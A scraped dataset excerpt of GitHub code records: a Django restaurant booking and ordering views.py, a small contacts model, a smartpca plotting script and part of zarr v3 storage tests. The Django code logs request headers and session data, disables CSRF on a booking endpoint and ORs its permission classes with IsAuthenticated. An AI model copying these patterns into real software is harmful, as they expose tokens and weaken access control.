contacts=base.split('\\n')\n flag=True\n result=[]\n for i in contacts:\n contact_data=i.split('; ')\n if id_str==contact_data[0]:\n flag=False\n result.append(i)\n return result\n if flag:\n result.append('Контакт не найден')\n return result\n\ndef get_all_ids(base):\n contacts=base.split('\\n')\n result=[]\n for i in contacts:\n contact_data=i.split('; ')\n result.append(contact_data[0])\n return result\n\n \n \n \n\n# def new_id(base):\n# if len(base.split('\\n'))==0:\n# return 1\n# else:\n# return int(base.split('\\n')[len(base.split('\\n')-1)].split(';')[0])+1\n\n\ndef del_contact(base,result):\n base=base.split('\\n')\n base.remove(result)\n return base\n\ndef edit_contact(base,contact,new_contact):\n base=base.split('\\n')\n print(contact)\n id=contact.split( )[0]\n print(id)\n index=base.index(contact)\n base[index]=id +' '+new_contact\n return base 
\n","repo_name":"MaksimKutlaev/Python","sub_path":"DZ/DZ8/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"42193838390","text":"from django.http import HttpResponse,JsonResponse\nfrom django.shortcuts import render,redirect\nfrom .forms import BookingForm\nfrom .models import Menu, Category,Cart,Order,OrderItem,Deliverystatus,Rating,Booking\nfrom rest_framework import generics\nfrom .serializers import MenuItemSerializer, CategorySerializer,RatingSerializer,CartSerializer,OrderSerializer,OrderItemSerializer,BookingSerializer\nfrom rest_framework import permissions\nfrom django.contrib.auth.models import User,Group\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authentication import TokenAuthentication, SessionAuthentication\nfrom django.utils import timezone\nfrom rest_framework.response import Response\nfrom rest_framework import status, viewsets,generics\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework.throttling import AnonRateThrottle, UserRateThrottle\nfrom django.core.exceptions import PermissionDenied\nfrom django.core import serializers\nfrom django.views.decorators.csrf import csrf_exempt\nfrom datetime import datetime\nimport json\nfrom django.views import View\nimport requests\nfrom djoser.views import TokenCreateView\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login\nfrom django.http import Http404\nfrom rest_framework.views import APIView\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom datetime import datetime, timedelta\nfrom django.contrib.auth.decorators import login_required \nfrom rest_framework.permissions import BasePermission\nfrom rest_framework.decorators import action\nfrom django.utils.decorators import method_decorator\nfrom restaurant.utils import get_user_orders,get_or_create_cart_entry,YourPaginationClass\nfrom .perm import IsManager,IsManagerOrReadOnly,IsDeliveryCrew,IsOrderOwner\n\n\n\n\n\n\nclass CustomTokenCreateView(View):\n template_name = 'login.html'\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name)\n\n def post(self, request, *args, **kwargs):\n username = request.POST.get('username')\n password = request.POST.get('password')\n\n user = authenticate(request, username=username, password=password)\n\n if user:\n # If the credentials are correct, log in the user\n login(request, user)\n\n # Redirect to a secure and trusted URL after successful login\n return redirect('restaurant:home')\n else:\n # If the credentials are incorrect, provide an error message\n return render(request, self.template_name, {'error_message': 'Incorrect credentials. 
Please try again.'})\n\nclass RegistrationView(View):\n template_name = 'registration.html'\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name)\n\n def post(self, request, *args, **kwargs):\n # Extract user registration data from the form\n email = request.POST.get('email')\n username = request.POST.get('username')\n password = request.POST.get('password')\n\n # Djoser registration endpoint URL\n djoser_registration_url = 'http://localhost:8000/api/users/'\n\n # Data to be sent to Djoser registration endpoint\n registration_data = {\n 'email': email,\n 'username': username,\n 'password': password,\n }\n\n # Make a POST request to Djoser registration endpoint\n response = requests.post(djoser_registration_url, data=registration_data)\n\n # Check the response from Djoser\n if response.status_code == 201: # Successful registration\n return render(request, self.template_name, {'success_message': 'Registration successful'})\n else: # Registration failed\n return render(request, self.template_name, {'error_message': response.text})\n\n\n\ndef home(request):\n print(f\"Request headers: {request.headers}\")\n\n print(f\"Session data: {request.session.items()}\")\n print(f\"User: {request.user}\")\n print(f\"Is authenticated? {request.user.is_authenticated}\")\n\n return render(request, 'index.html')\n\ndef about(request):\n return render(request, 'about.html')\n\n\n\n\n\n\n\nclass BookingViewSet(viewsets.ModelViewSet):\n permission_classes = [IsAuthenticated]\n authentication_classes = [TokenAuthentication, SessionAuthentication]\n\n \n queryset = Booking.objects.all()\n serializer_class = BookingSerializer\n\n def list(self, request, *args, **kwargs):\n # Print statement to check if the session token is present in the headers\n print(f\"Request Headers: {request.headers}\")\n\n return super().list(request, *args, **kwargs)\n\n\n\ndef book(request):\n form = BookingForm()\n if request.method == 'POST':\n form = BookingForm(request.POST)\n if form.is_valid():\n form.save()\n context = {'form': form}\n return render(request, 'book.html', context)\n\n\n\n@csrf_exempt\ndef bookings(request):\n if request.method == 'POST':\n data = json.load(request)\n exist = Booking.objects.filter(reservation_date=data['reservation_date']).filter(\n reservation_slot=data['reservation_slot']).exists()\n if not exist:\n # Get the user making the reservation\n user = request.user\n\n # Retrieve the menu based on the provided menu_id (adjust the key based on your actual data structure)\n menu_id = data.get('menu', None)\n menu = Menu.objects.get(id=menu_id) if menu_id else None\n\n\n #selected_time = ... 
# get this value based on frontend logic\n \n\n\n # Create the Booking object with user and menu\n booking = Booking(\n user=user,\n first_name=data['first_name'],\n reservation_date=data['reservation_date'],\n reservation_slot=data['reservation_slot'],\n menu=menu,\n #reservation_time=selected_time, # User-selected time for the reservation\n #expiration_time=selected_time + timedelta(hours=1) \n )\n booking.save()\n else:\n return HttpResponse(\"{'error':1}\", content_type='application/json')\n\n date = request.GET.get('date', datetime.today().date())\n\n # Check if the user is a manager\n if request.user.is_staff:\n # If the user is a manager, return all bookings\n bookings = Booking.objects.all().filter(reservation_date=date)\n else:\n # If the user is not a manager, return only the user's bookings\n bookings = Booking.objects.filter(reservation_date=date, user=request.user)\n\n # Serialize the Booking objects\n booking_json = serializers.serialize('json', bookings)\n\n # Modify the serialized data to include the menu name and user name\n booking_data = json.loads(booking_json)\n for entry in booking_data:\n fields = entry['fields']\n\n # Replace menu ID with menu name\n menu_id = fields['menu']\n if menu_id:\n menu_name = Menu.objects.get(id=menu_id).name\n fields['menu'] = menu_name\n\n # Replace user ID with username\n user_id = fields['user']\n if user_id:\n user_name = User.objects.get(id=user_id).username\n fields['user'] = user_name\n\n # Convert back to JSON and return the response\n return HttpResponse(json.dumps(booking_data), content_type='application/json')\n\ndef booking(request):\n date = request.GET.get('date', datetime.today().date())\n user = request.user if request.user.is_authenticated else None\n\n # Make a request to the 'bookings' view to get the booking data\n response = bookings(request)\n \n if response.status_code == 200:\n # Parse the JSON content\n try:\n booking_data = json.loads(response.content)\n except json.JSONDecodeError:\n return JsonResponse({'error': 'Unable to parse booking data'})\n \n\n # Process the JSON data as needed for rendering\n processed_data = [\n {\n 'first_name': item['fields']['first_name'],\n 'reservation_date': item['fields']['reservation_date'],\n 'reservation_slot': item['fields']['reservation_slot'],\n }\n for item in booking_data\n ]\n \n return render(request, 'bookings.html', {'booking_data': processed_data})\n else:\n # Handle the case where the 'bookings' view returns an error\n return JsonResponse({'error': 'Unable to fetch booking data'})\n\n\n\n\n\ndef menu_data(request):\n categories = Category.objects.values_list('title', flat=True).distinct()\n menus = Menu.objects.all()\n\n category_menu_data = {\n 'categories': list(categories),\n 'menus': [{'id': menu.id, 'name': menu.name, 'category': menu.category.title} for menu in menus],\n }\n\n # Use DjangoJSONEncoder to handle serialization of additional types\n return JsonResponse(category_menu_data, encoder=DjangoJSONEncoder)\n\n\n\n\n\n\nclass MenuItemsView(generics.ListCreateAPIView):\n queryset = Menu.objects.all()\n serializer_class = MenuItemSerializer\n ordering_fields = ['price', 'inventory']\n filterset_fields = ['price', 'inventory']\n search_fields = ['name']\n pagination_class = YourPaginationClass\n permission_classes = [IsManagerOrReadOnly]\n\n def get(self, request, *args, **kwargs):\n menu_items = self.get_queryset()\n print(\"Primary keys of menu items:\", [item.pk for item in menu_items])\n\n serializer = self.get_serializer(menu_items, many=True)\n \n 
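# NOTE (editor's comment): unlike a typical DRF ListCreateAPIView response, this\n        # override renders an HTML template with the serialized data instead of returning\n        # a JSON Response, so API clients hitting this route receive a web page.\n        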
return render(request, 'menu.html', {'menu_items': serializer.data})\n\n\nclass SingleMenuItemView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Menu.objects.all()\n serializer_class = MenuItemSerializer\n permission_classes = [IsManagerOrReadOnly] \n\n def get(self, request, *args, **kwargs):\n menu_item = self.get_object()\n serializer = self.get_serializer(menu_item)\n return render(request, 'menu_item.html', {'menu_item': serializer.data})\n\n \nclass CategoriesView(generics.ListCreateAPIView):\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n\n\nclass RatingsView(generics.ListCreateAPIView):\n throttle_classes = [AnonRateThrottle, UserRateThrottle]\n\n queryset = Rating.objects.all()\n serializer_class = RatingSerializer\n\n def get_permissions(self):\n if(self.request.method=='GET'):\n return []\n\n return [IsAuthenticated()]\n \n\n\n\nclass CartAddItemView(generics.CreateAPIView):\n serializer_class = CartSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n def create(self, request, *args, **kwargs):\n menu_item_id = request.data.get('menu')\n quantity = request.data.get('quantity', 1)\n\n if not menu_item_id:\n return Response({'error': 'Menu item ID is required.'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n menu_item = Menu.objects.get(id=menu_item_id)\n except Menu.DoesNotExist:\n return Response({'error': 'Menu item not found.'}, status=status.HTTP_404_NOT_FOUND)\n\n # Validate quantity\n if not isinstance(quantity, int) or quantity <= 0:\n return Response({'error': 'Invalid quantity.'}, status=status.HTTP_400_BAD_REQUEST)\n\n # Use the helper function to get or create a cart entry\n cart_entry, new_entry_created = get_or_create_cart_entry(request.user, menu_item)\n\n # Adjust the response based on whether a new entry was created\n status_code = status.HTTP_201_CREATED if new_entry_created else status.HTTP_200_OK\n\n serializer = CartSerializer(cart_entry)\n return Response(serializer.data, status=status_code)\n\n\n\n\n\n\n\n\n\nclass CartMenuItemsView(APIView):\n throttle_classes = [AnonRateThrottle, UserRateThrottle]\n permission_classes = [IsAuthenticated]\n serializer_class = CartSerializer\n\n def get(self, request, *args, **kwargs):\n cart_items = Cart.objects.filter(user=request.user).order_by('-created_at')\n cart_total = sum(item.price for item in cart_items)\n\n context = {'cart_items': cart_items, 'cart_total': cart_total}\n return render(request, 'cart.html', context)\n\n def perform_create(self, serializer):\n menu_item = serializer.validated_data['menu']\n cart_entry, new_entry_created = get_or_create_cart_entry(self.request.user, menu_item)\n status_code = status.HTTP_201_CREATED if new_entry_created else status.HTTP_200_OK\n serializer = CartSerializer(cart_entry)\n return Response(serializer.data, status=status_code)\n\n def delete(self, request, *args, **kwargs):\n # Delete all menu items created by the current user\n Cart.objects.filter(user=request.user).delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n \n\nclass CartItemDetailView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Cart.objects.all()\n serializer_class = CartSerializer\n permission_classes = [IsAuthenticated]\n\n def get_object(self):\n cart_item_id = self.kwargs['pk']\n user = self.request.user\n\n try:\n cart_item = Cart.objects.get(pk=cart_item_id, user=user)\n return cart_item\n except Cart.DoesNotExist:\n raise Http404(\"Cart item does not exist or does not belong to the user.\")\n\n def update(self, request, *args, 
**kwargs):\n instance = self.get_object()\n quantity_change = request.data.get('quantity_change', 0)\n\n if not isinstance(quantity_change, int):\n return Response({'error': 'Invalid quantity change.'}, status=status.HTTP_400_BAD_REQUEST)\n\n # Update the quantity\n instance.quantity += quantity_change\n\n # Check if the updated quantity is zero, and delete the item from the cart\n if instance.quantity <= 0:\n instance.delete()\n return Response({'message': 'Item deleted from the cart.'}, status=status.HTTP_204_NO_CONTENT)\n else:\n instance.save()\n serializer = self.get_serializer(instance)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\n\n\n\nclass OrderListView(generics.ListCreateAPIView):\n throttle_classes = [AnonRateThrottle, UserRateThrottle]\n serializer_class = OrderSerializer\n permission_classes = [IsAuthenticated]\n\n def get_user_orders(self):\n user = self.request.user\n if user.groups.filter(name='manager').exists():\n # If the user is a manager, return all orders\n return Order.objects.all().order_by('-time')\n else:\n # If the user is not a manager, return orders for that user\n return get_user_orders(self.request).order_by('-time')\n\n def get_queryset(self):\n return self.get_user_orders()\n\n def perform_create(self, serializer):\n # Retrieve current cart items for the current user\n cart_items = Cart.objects.filter(user=self.request.user)\n\n # Check if the cart is not empty\n if not cart_items.exists():\n raise PermissionDenied({'error': 'Cart is empty'})\n\n # Calculate total price based on cart items\n total_price = sum(cart_item.price for cart_item in cart_items)\n\n delivery_option = self.request.data.get('delivery_option', 'SelfPickUp')\n\n # Set delivery_status based on delivery_option\n delivery_status = 'Pending' if delivery_option == 'Delivery' else None\n\n # Create a new order\n order = Order.objects.create(\n user=self.request.user,\n total=total_price,\n time=datetime.now(),\n delivery_status=delivery_status,\n delivery_option=delivery_option,\n )\n\n # Create order items based on cart items\n for cart_item in cart_items:\n OrderItem.objects.create(\n order=order,\n menu=cart_item.menu,\n quantity=cart_item.quantity,\n unit_price=cart_item.unit_price,\n price=cart_item.price,\n )\n\n # Delete all items from the cart for this user\n cart_items.delete()\n\n # Set the created order as the serializer instance\n serializer.instance = order\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n def get(self, request, *args, **kwargs):\n orders = self.get_queryset()\n return render(request, 'order.html', {'orders': orders})\n\n\nclass OrderDetailView(generics.RetrieveUpdateDestroyAPIView):\n throttle_classes = [AnonRateThrottle, UserRateThrottle]\n queryset = Order.objects.all()\n serializer_class = OrderSerializer\n permission_classes = [IsOrderOwner | IsManagerOrReadOnly | IsDeliveryCrew | IsManager | IsAuthenticated]\n\n def update(self, request, *args, **kwargs):\n partial = kwargs.pop('partial', False)\n instance = self.get_object()\n serializer = self.get_serializer(instance, data=request.data, partial=partial)\n serializer.is_valid(raise_exception=True)\n\n # Check if a manager or delivery crew is updating the order\n if 
request.user.groups.filter(name='manager').exists():\n            # Only managers can assign a delivery crew\n            self.check_manager_permissions(serializer.validated_data)\n        elif request.user.groups.filter(name='delivery_crew').exists():\n            # Delivery crew can update the delivery_status field\n            self.check_delivery_crew_permissions(serializer.validated_data)\n        else:\n            # Users/customers can only update the order without assigning a delivery crew\n            serializer.validated_data.pop('delivery_status', None)\n\n        # Allow updating other fields (like status) for all user groups\n        self.perform_update(serializer)\n        return Response(serializer.data)\n\n    def perform_destroy(self, instance):\n        # Check if the user has permission to delete the order\n        self.check_manager_permissions()\n        # Perform additional actions before deleting the order\n        instance.delete()\n\n    def delete(self, request, *args, **kwargs):\n        instance = self.get_object()\n        # Check if the user has permission to delete the order\n        self.check_manager_permissions()\n        self.perform_destroy(instance)\n        return Response(status=status.HTTP_204_NO_CONTENT)\n\n    def get_user_orders(self):\n        return get_user_orders(self.request).order_by('-time')\n\n    def get_queryset(self):\n        return self.get_user_orders()\n\n    def get_permissions(self):\n        return super().get_permissions()\n\n    def check_manager_permissions(self, validated_data=None):\n        if validated_data and 'delivery_status' in validated_data and validated_data['delivery_status'] is not None:\n            raise PermissionDenied(\"Managers can only update the status or assign a delivery crew.\")\n\n    def check_delivery_crew_permissions(self, validated_data=None):\n        if validated_data and 'delivery_status' in validated_data:\n            # Additional logic for handling status updates by delivery crew\n            # You may want to add more conditions or validation here\n            pass\n        elif validated_data is not None:\n            # Delivery crew cannot update the delivery_status field; drop it safely\n            # (guarding against validated_data being None avoids an AttributeError)\n            validated_data.pop('delivery_status', None)\n\n\n@api_view(['GET'])\n@permission_classes([IsManager])\ndef delivery_crew_list(request):\n    # Retrieve all users who belong to the 'delivery_crew' group\n    delivery_crew_users = User.objects.filter(groups__name='delivery_crew')\n\n    # Extract data from User and Deliverystatus models\n    crew_data = [\n        {\n            'id': user.delivery_crew.id if hasattr(user, 'delivery_crew') else None,\n            'name': user.delivery_crew.name if hasattr(user, 'delivery_crew') else None,\n            'is_available': user.delivery_crew.is_available if hasattr(user, 'delivery_crew') else None\n        }\n        for user in delivery_crew_users\n    ]\n\n    return Response(crew_data)\n\n\n@api_view(['PUT'])\n@permission_classes([IsManager])\ndef assign_delivery_crew(request, order_id):\n    # Extract delivery crew ID from the request data\n    delivery_crew_id = request.data.get('delivery_crew_id')\n\n    # Retrieve the order and delivery crew objects\n    order = get_object_or_404(Order, pk=order_id)\n    delivery_crew = get_object_or_404(Deliverystatus, pk=delivery_crew_id)\n\n    # Ensure the order is pending before assigning a delivery crew\n    if order.order_status == 'Pending Assignment':\n        # Check if the delivery crew is available\n        if delivery_crew.is_available:\n            # Update the associated user's delivery_crew field\n            user = User.objects.filter(deliverystatus=delivery_crew).first()\n            if user:\n                user.deliverystatus = None\n                user.save()\n\n            # Assign the delivery crew to the order\n            order.deliverystatus = delivery_crew\n            order.order_status = 'Assigned' # Update the order status\n            order.save()\n\n            return Response({'success': 'Delivery crew assigned successfully'}, 
status=status.HTTP_200_OK)\n        else:\n            return Response({'error': 'Selected delivery crew is not available'}, status=status.HTTP_400_BAD_REQUEST)\n    else:\n        return Response({'error': 'Order must be pending to assign a delivery crew'}, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['PUT'])\n@permission_classes([IsManager])\ndef mark_delivered(request, order_id):\n    order = get_object_or_404(Order, pk=order_id)\n\n    # Ensure the order is assigned before marking as delivered\n    if order.order_status == 'Assigned':\n        # Update the associated user's delivery_crew field\n        user = User.objects.filter(delivery_crew=order.delivery_crew).first()\n        if user:\n            user.delivery_crew = None\n            user.save()\n\n        order.order_status = 'Delivered'\n        order.save()\n        return Response({'success': 'Order marked as delivered successfully'}, status=status.HTTP_200_OK)\n    else:\n        return Response({'error': 'Order must be assigned to mark as delivered'}, status=status.HTTP_400_BAD_REQUEST)\n\n# Restored: the class header and decorator were commented out, which left the\n# indented body below as unreachable dead code inside mark_delivered().\n@method_decorator(login_required, name='dispatch')\nclass AssignDeliveryCrewView(View):\n    template_name = 'assign_delivery_crew.html'\n\n    def get(self, request, order_id):\n        # You can perform any necessary checks here before rendering the template\n        # For example, check if the user is a manager\n\n        # Pass the order_id to the template\n        context = {'order_id': order_id}\n        return render(request, self.template_name, context)\n\n\ndef checkout(request):\n    # Retrieve cart items for the current user\n    cart_items = Cart.objects.filter(user=request.user)\n\n    # Calculate total price\n    total_price = sum(item.menu.price * item.quantity for item in cart_items)\n\n    if request.method == 'POST':\n        if not request.user.is_authenticated:\n            return redirect('login')\n\n        order_time = timezone.now()\n\n        # Create an order locally in the Django database\n        order = Order.objects.create(user=request.user, total=total_price, time=order_time)\n\n        # Move cart items to the order\n        for cart_item in cart_items:\n            OrderItem.objects.create(\n                order=order,\n                menu=cart_item.menu,\n                quantity=cart_item.quantity,\n                unit_price=cart_item.menu.price,\n                price=cart_item.menu.price * cart_item.quantity\n            )\n\n        # Clear the user's cart\n        cart_items.delete()\n\n        return HttpResponse('Order successful!')\n\n    return render(request, 'checkout.html', {'cart_items': cart_items, 'total_price': total_price})\n\n\n@api_view(['GET', 'POST'])\n@permission_classes([IsManagerOrReadOnly])\ndef manager_users(request):\n    if request.method == 'GET':\n        # Retrieve all users in the 'manager' group\n        managers = User.objects.filter(groups__name='manager')\n        manager_data = [{'id': manager.id, 'username': manager.username} for manager in managers]\n        return Response(manager_data)\n\n    elif request.method == 'POST':\n        # Assign the user in the payload to the 'manager' group\n        try:\n            user_id = request.data['user_id']\n            user = User.objects.get(pk=user_id)\n        except (KeyError, User.DoesNotExist):\n            return Response({'error': 'Invalid user_id'}, status=status.HTTP_400_BAD_REQUEST)\n\n        manager_group, created = Group.objects.get_or_create(name='manager')\n        user.groups.add(manager_group)\n        return Response(status=status.HTTP_201_CREATED)\n\n\n@api_view(['DELETE'])\n@permission_classes([IsManagerOrReadOnly])\ndef remove_manager_user(request, user_id):\n    user = get_object_or_404(User, pk=user_id)\n    manager_group = Group.objects.get(name='manager')\n    user.groups.remove(manager_group)\n    return Response({'success': 'User removed from manager group successfully'}, 
status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST'])\n@permission_classes([IsManagerOrReadOnly])\ndef delivery_crew_users(request):\n if request.method == 'GET':\n # Retrieve all users in the 'delivery_crew' group\n delivery_crew = User.objects.filter(groups__name='delivery_crew')\n delivery_crew_data = [{'id': user.id, 'username': user.username} for user in delivery_crew]\n return Response(delivery_crew_data)\n\n elif request.method == 'POST':\n # Assign the user in the payload to the 'delivery_crew' group\n try:\n user_id = request.data['user_id']\n user = User.objects.get(pk=user_id)\n except (KeyError, User.DoesNotExist):\n return Response({'error': 'Invalid user_id'}, status=status.HTTP_400_BAD_REQUEST)\n\n delivery_crew_group, created = Group.objects.get_or_create(name='delivery_crew')\n user.groups.add(delivery_crew_group)\n return Response({'success': 'User added to delivery_crew group successfully'}, status=status.HTTP_201_CREATED)\n\n@api_view(['DELETE'])\n@permission_classes([IsManagerOrReadOnly])\ndef remove_delivery_crew_user(request, user_id):\n user = get_object_or_404(User, pk=user_id)\n delivery_crew_group = Group.objects.get(name='delivery_crew')\n user.groups.remove(delivery_crew_group)\n return Response({'success': 'User removed from delivery_crew group successfully'}, status=status.HTTP_200_OK)\n","repo_name":"Decodeine/restaurant","sub_path":"restaurant/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":26855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"23775365357","text":"import sys,os\ndef write_par(prefix):\n parf='{}.par'.format(prefix)\n with open(parf, 'w') as out:\n out.write('genotypename: {}.geno\\n'.format(prefix))\n out.write('snpname: {}.snp\\n'.format(prefix))\n out.write('indivname: {}.ind\\n'.format(prefix))\n out.write('evecoutname: {}.evec\\n'.format(prefix))\n out.write('evaloutname: {}.eval\\n'.format(prefix))\n out.write('altnormstyle: NO\\n')\n out.write('numoutlieriter: 0\\n')\n print('write PCA parameter file into {}'.format(parf))\n\ndef write_plot(prefix):\n rscf='{}.r'.format(prefix)\n with open(rscf, 'w') as out:\n out.write('library(ggplot2)\\n')\n out.write('eval<-read.table(\"{}.eval\")\\n'.format(prefix))\n out.write('xl<-paste(\"PC1(\",round(eval$V1[1],digits=2),\"%)\",sep=\"\")\\n')\n out.write('yl<-paste(\"PC2(\",round(eval$V1[2],digits=2),\"%)\",sep=\"\")\\n')\n out.write('evec<-read.table(\"{}.evec\",skip=1)\\n'.format(prefix))\n out.write('pdf(\"{}_pca.pdf\")\\n'.format(prefix))\n out.write('p<-ggplot(data=evec,aes(x=V2,y=V3,color=V12))+xlab(xl)+ylab(yl)\\n')\n out.write('p+geom_point(lwd=4)\\n')\n out.write('dev.off()\\n')\n print('write plot PCA script to {}.r\\n'.format(prefix))\n \ndef pca(prefix):\n write_par(prefix)\n os.system('smartpca -p {}.par > {}_pca.log'.format(prefix,prefix))\n write_plot(prefix)\n os.system('Rscript {}.r'.format(prefix))\n print('Finished the PCA pipeline, please check results in {}_pca.pdf'.format(prefix))\n\nif __name__=='__main__':\n if len(sys.argv)>1:\n pca(sys.argv[1])\n else:\n print('Usage: python {} prefix'.format(sys.argv[0]))\n","repo_name":"Shuhua-Group/AdmixSim","sub_path":"pcapipe.py","file_name":"pcapipe.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"833412609","text":"import array\nimport atexit\nimport copy\nimport inspect\nimport os\nimport tempfile\n\nimport numpy as np\nimport 
pytest\n\nimport zarr\nfrom zarr._storage.store import _get_hierarchy_metadata, v3_api_available, StorageTransformer\nfrom zarr._storage.v3_storage_transformers import ShardingStorageTransformer, v3_sharding_available\nfrom zarr.core import Array\nfrom zarr.meta import _default_entry_point_metadata_v3\nfrom zarr.storage import (\n atexit_rmglob,\n atexit_rmtree,\n data_root,\n default_compressor,\n getsize,\n init_array,\n meta_root,\n normalize_store_arg,\n)\nfrom zarr._storage.v3 import (\n ABSStoreV3,\n ConsolidatedMetadataStoreV3,\n DBMStoreV3,\n DirectoryStoreV3,\n FSStoreV3,\n KVStore,\n KVStoreV3,\n LMDBStoreV3,\n LRUStoreCacheV3,\n MemoryStoreV3,\n MongoDBStoreV3,\n RedisStoreV3,\n SQLiteStoreV3,\n StoreV3,\n ZipStoreV3,\n)\nfrom zarr.tests.util import CountingDictV3, have_fsspec, skip_test_env_var, mktemp\n\n# pytest will fail to run if the following fixtures aren't imported here\nfrom .test_storage import StoreTests as _StoreTests\nfrom .test_storage import TestABSStore as _TestABSStore\nfrom .test_storage import TestConsolidatedMetadataStore as _TestConsolidatedMetadataStore\nfrom .test_storage import TestDBMStore as _TestDBMStore\nfrom .test_storage import TestDBMStoreBerkeleyDB as _TestDBMStoreBerkeleyDB\nfrom .test_storage import TestDBMStoreDumb as _TestDBMStoreDumb\nfrom .test_storage import TestDBMStoreGnu as _TestDBMStoreGnu\nfrom .test_storage import TestDBMStoreNDBM as _TestDBMStoreNDBM\nfrom .test_storage import TestDirectoryStore as _TestDirectoryStore\nfrom .test_storage import TestFSStore as _TestFSStore\nfrom .test_storage import TestLMDBStore as _TestLMDBStore\nfrom .test_storage import TestLRUStoreCache as _TestLRUStoreCache\nfrom .test_storage import TestMemoryStore as _TestMemoryStore\nfrom .test_storage import TestSQLiteStore as _TestSQLiteStore\nfrom .test_storage import TestSQLiteStoreInMemory as _TestSQLiteStoreInMemory\nfrom .test_storage import TestZipStore as _TestZipStore\nfrom .test_storage import dimension_separator_fixture, s3, skip_if_nested_chunks # noqa\n\n\npytestmark = pytest.mark.skipif(not v3_api_available, reason=\"v3 api is not available\")\n\n\n@pytest.fixture(\n params=[\n (None, \"/\"),\n (\".\", \".\"),\n (\"/\", \"/\"),\n ]\n)\ndef dimension_separator_fixture_v3(request):\n return request.param\n\n\nclass DummyStore:\n # contains all methods expected of Mutable Mapping\n\n def keys(self):\n \"\"\"keys\"\"\"\n\n def values(self):\n \"\"\"values\"\"\"\n\n def get(self, value, default=None):\n \"\"\"get\"\"\"\n\n def __setitem__(self, key, value):\n \"\"\"__setitem__\"\"\"\n\n def __getitem__(self, key):\n \"\"\"__getitem__\"\"\"\n\n def __delitem__(self, key):\n \"\"\"__delitem__\"\"\"\n\n def __contains__(self, key):\n \"\"\"__contains__\"\"\"\n\n\nclass InvalidDummyStore:\n # does not contain expected methods of a MutableMapping\n\n def keys(self):\n \"\"\"keys\"\"\"\n\n\nclass DummyStorageTransfomer(StorageTransformer):\n TEST_CONSTANT = \"test1234\"\n\n extension_uri = \"https://purl.org/zarr/spec/storage_transformers/dummy/1.0\"\n valid_types = [\"dummy_type\"]\n\n def __init__(self, _type, test_value) -> None:\n super().__init__(_type)\n assert test_value == self.TEST_CONSTANT\n self.test_value = test_value\n\n\ndef test_ensure_store_v3():\n class InvalidStore:\n pass\n\n with pytest.raises(ValueError):\n StoreV3._ensure_store(InvalidStore())\n\n # cannot initialize with a store from a different Zarr version\n with pytest.raises(ValueError):\n StoreV3._ensure_store(KVStore(dict()))\n\n assert StoreV3._ensure_store(None) is None\n\n 
# class with all methods of a MutableMapping will become a KVStoreV3\n assert isinstance(StoreV3._ensure_store(DummyStore), KVStoreV3)\n\n with pytest.raises(ValueError):\n # does not have the methods expected of a MutableMapping\n StoreV3._ensure_store(InvalidDummyStore)\n\n\ndef test_valid_key():\n store = KVStoreV3(dict)\n\n # only ascii keys are valid\n assert not store._valid_key(5)\n assert not store._valid_key(2.8)\n\n for key in store._valid_key_characters:\n assert store._valid_key(key)\n\n # other characters not in store._valid_key_characters are not allowed\n assert not store._valid_key(\"*\")\n assert not store._valid_key(\"~\")\n assert not store._valid_key(\"^\")\n\n\ndef test_validate_key():\n store = KVStoreV3(dict)\n\n # zarr.json is a valid key\n store._validate_key(\"zarr.json\")\n # but other keys not starting with meta/ or data/ are not\n with pytest.raises(ValueError):\n store._validate_key(\"zar.json\")\n\n # valid ascii keys\n for valid in [\n meta_root + \"arr1.array.json\",\n data_root + \"arr1.array.json\",\n meta_root + \"subfolder/item_1-0.group.json\",\n ]:\n store._validate_key(valid)\n # but otherwise valid keys cannot end in /\n with pytest.raises(ValueError):\n assert store._validate_key(valid + \"/\")\n\n for invalid in [0, \"*\", \"~\", \"^\", \"&\"]:\n with pytest.raises(ValueError):\n store._validate_key(invalid)\n\n\nclass StoreV3Tests(_StoreTests):\n\n version = 3\n root = meta_root\n\n def test_getsize(self):\n # TODO: determine proper getsize() behavior for v3\n # Currently returns the combined size of entries under\n # meta/root/path and data/root/path.\n # Any path not under meta/root/ or data/root/ (including zarr.json)\n # returns size 0.\n\n store = self.create_store()\n if isinstance(store, dict) or hasattr(store, \"getsize\"):\n assert 0 == getsize(store, \"zarr.json\")\n store[meta_root + \"foo/a\"] = b\"x\"\n assert 1 == getsize(store)\n assert 1 == getsize(store, \"foo\")\n store[meta_root + \"foo/b\"] = b\"x\"\n assert 2 == getsize(store, \"foo\")\n assert 1 == getsize(store, \"foo/b\")\n store[meta_root + \"bar/a\"] = b\"yy\"\n assert 2 == getsize(store, \"bar\")\n store[data_root + \"bar/a\"] = b\"zzz\"\n assert 5 == getsize(store, \"bar\")\n store[data_root + \"baz/a\"] = b\"zzz\"\n assert 3 == getsize(store, \"baz\")\n assert 10 == getsize(store)\n store[data_root + \"quux\"] = array.array(\"B\", b\"zzzz\")\n assert 14 == getsize(store)\n assert 4 == getsize(store, \"quux\")\n store[data_root + \"spong\"] = np.frombuffer(b\"zzzzz\", dtype=\"u1\")\n assert 19 == getsize(store)\n assert 5 == getsize(store, \"spong\")\n 